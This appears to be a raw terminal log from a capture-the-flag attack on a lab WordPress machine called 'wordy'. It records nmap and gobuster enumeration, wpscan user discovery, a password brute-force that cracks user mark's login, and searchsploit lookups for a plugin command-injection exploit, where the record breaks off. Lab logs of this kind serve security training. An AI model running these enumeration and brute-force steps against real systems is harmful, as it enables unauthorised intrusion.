root@Blue3:~# nmapfull wordy
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-12 21:37 +07
Nmap scan report for wordy (192.168.1.9)
Host is up (0.0048s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Wordy &#8211; Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:64:57:8E (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   4.76 ms wordy (192.168.1.9)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.70 seconds

#
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
#

root@Blue3:~# webdirscan --url=http://wordy
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://wordy
[+] Threads:        30
[+] Wordlist:       /media/Linux-Storage/[Github]/eblue3/CTF/Wordlists/WEB/big
[+] Status codes:   200,204,301,302,307
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     config,cfg,cgi,html,php,txt
[+] Timeout:        10s
===============================================================
2020/09/12 21:40:34 Starting gobuster
===============================================================
/index.php (Status: 301)
/license.txt (Status: 200)
/readme.html (Status: 200)
/wp-content (Status: 301)
/wp-config.php (Status: 200)
/wp-includes (Status: 301)
/wp-admin (Status: 301)
/wp-login.php (Status: 200)
/wp-trackback.php (Status: 200)
===============================================================
2020/09/12 21:41:14 Finished
===============================================================

#
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
#

root@Blue3:~# webdirscan --url=http://wordy/wp-admin/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://wordy/wp-admin/
[+] Threads:        30
[+] Wordlist:       /media/Linux-Storage/[Github]/eblue3/CTF/Wordlists/WEB/big
[+] Status codes:   200,204,301,302,307
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,config,cfg,cgi,html
[+] Timeout:        10s
===============================================================
2020/09/12 22:50:18 Starting gobuster
===============================================================
/about.php (Status: 302)
/admin.php (Status: 302)
/comment.php (Status: 302)
/credits.php (Status: 302)
/css (Status: 301)
/customize.php (Status: 302)
/edit.php (Status: 302)
/export.php (Status: 302)
/images (Status: 301)
/import.php (Status: 302)
/includes (Status: 301)
/index.php (Status: 302)
/install.php (Status: 200)
/js (Status: 301)
/link.php (Status: 302)
/maint (Status: 301)
/media.php (Status: 302)
/moderation.php (Status: 302)
/network (Status: 301)
/network.php (Status: 302)
/options.php (Status: 302)
/plugins.php (Status: 302)
/post.php (Status: 302)
/privacy.php (Status: 302)
/profile.php (Status: 302)
/revision.php (Status: 302)
/term.php (Status: 302)
/themes.php (Status: 302)
/tools.php (Status: 302)
/upload.php (Status: 302)
/update.php (Status: 302)
/upgrade.php (Status: 200)
/user (Status: 301)
/users.php (Status: 302)
/widgets.php (Status: 302)
===============================================================
2020/09/12 22:50:58 Finished
===============================================================

#
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
#

root@Blue3:~# webdirscan --url=http://wordy/index.php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://wordy/index.php
[+] Threads:        30
[+] Wordlist:       /media/Linux-Storage/[Github]/eblue3/CTF/Wordlists/WEB/big
[+] Status codes:   200,204,301,302,307
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt,config,cfg,cgi
[+] Timeout:        10s
===============================================================
2020/09/12 21:45:07 Starting gobuster
===============================================================
/0000 (Status: 301)
/0 (Status: 301)
/2019 (Status: 301)
/A (Status: 301)
/About (Status: 301)
/C (Status: 301)
/Contact (Status: 301)
/H (Status: 301)
/W (Status: 301)
/_contentindex.php (Status: 301)
/_index.php (Status: 301)
/a (Status: 301)
/ab (Status: 301)
/abo (Status: 301)
/about (Status: 301)
/about-us (Status: 301)
/asdfjkl; (Status: 301)
/atom (Status: 301)
/blogindex.php (Status: 301)
/c (Status: 301)
/co (Status: 301)
/comment-page-1 (Status: 301)
/comment-page-2 (Status: 301)
/comment-page-4 (Status: 301)
/comment-page-3 (Status: 301)
/comment-page-5 (Status: 301)
/comment-page-6 (Status: 301)
/con (Status: 301)
/conta (Status: 301)
/cont (Status: 301)
/contact (Status: 301)
/contact-us (Status: 301)
/embed (Status: 301)
/feed (Status: 301)
/fixed! (Status: 301)
/h (Status: 301)
/he (Status: 301)
/hell (Status: 301)
/hello (Status: 301)
/hello-world (Status: 301)
/images_noindex.php (Status: 301)
/index.php (Status: 301)
/newindex.php (Status: 301)
/no_index.php (Status: 301)
/no-index.php (Status: 301)
/noindex.php (Status: 301)
/oldindex.php (Status: 301)
/page1 (Status: 301)
/page2 (Status: 301)
/pageindex.php (Status: 301)
/rdf (Status: 301)
/rss (Status: 301)
/rss2 (Status: 301)
/searchindex.php (Status: 301)
/siteindex.php (Status: 301)
/w (Status: 301)
/we (Status: 301)
/welcome (Status: 301)
/wp-feed.php (Status: 301)
/wp-rss2.php (Status: 301)
/wp-register.php (Status: 301)
/~a (Status: 301)
===============================================================
2020/09/12 22:21:27 Finished
===============================================================

#
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
#

root@Blue3:~# wpscan -e --url http://wordy
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://wordy/ [192.168.1.9]
[+] Started: Sat Sep 12 21:41:54 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://wordy/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
 |  - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://wordy/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-08-11T00:00:00.000Z
 | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.4
 | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:01 <======================================================================> (346 / 346) 100.00% Time: 00:00:01
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:05 <====================================================================> (2575 / 2575) 100.00% Time: 00:00:05

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=========================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:00 <=============================================================================> (36 / 36) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:01 <==================================================================> (100 / 100) 100.00% Time: 00:00:01

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Sat Sep 12 21:42:08 2020
[+] Requests Done: 3149
[+] Cached Requests: 8
[+] Data Sent: 739.437 KB
[+] Data Received: 16.171 MB
[+] Memory used: 249.211 MB
[+] Elapsed time: 00:00:13

#
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
#

=>
WordPress 5.1.1
Apache/2.4.25 (Debian)
wp-user: admin, graham, mark, sarah, jens

root@Blue3:.../Wordlists# wpscan --url http://wordy --passwords passwords.txt --usernames mark -v
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - mark / helpdesk01
Trying mark / hendrik01 Time: 00:00:30 <=============================                                            > (1875 / 4543) 41.27%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: mark, Password: helpdesk01

 #
   ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
   ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
   ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
 #

 root@Blue3:~# searchsploit wordpress 5.5
 -------------------------------------------------------------------------------------------------------------------- ---------------------------------
  Exploit Title                                                                                                      |  Path
 -------------------------------------------------------------------------------------------------------------------- ---------------------------------
 WordPress Plugin WatuPRO 5.5.1 - SQL Injection                                                                      | php/webapps/42291.txt
 -------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Shellcodes: No Results

#
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ----------         NEXT          ---------- ---------- ---------- ----------
  ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ---------- ----------
#

 root@Blue3:~# searchsploit wordpress activity monitor
 -------------------------------------------------------------------------------------- ---------------------------------
  Exploit Title                                                                        |  Path
 -------------------------------------------------------------------------------------- ---------------------------------
 WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Inject | php/webapps/45274.html
 -------------------------------------------------------------------------------------- ---------------------------------
 Shellcodes: No Results
